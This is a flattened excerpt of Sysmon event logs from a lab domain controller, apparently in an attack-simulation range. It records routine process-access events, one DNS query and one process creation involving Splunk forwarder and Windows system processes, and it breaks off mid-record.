monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:27.591{10ACEC4A-8588-5FCF-C800-000000009101}4396psg-prod-eastus.azureedge.net0type: 5 psg-prod-eastus.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:152.199.19.161;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000004098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8596-5FCF-CD00-000000009101}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8596-5FCF-CD00-000000009101}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8596-5FCF-CD00-000000009101}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:30.483{10ACEC4A-8596-5FCF-CD00-000000009101}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.403{10ACEC4A-8598-5FCF-CE00-000000009101}47201352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8598-5FCF-CE00-000000009101}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8598-5FCF-CE00-000000009101}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.262{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8598-5FCF-CE00-000000009101}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 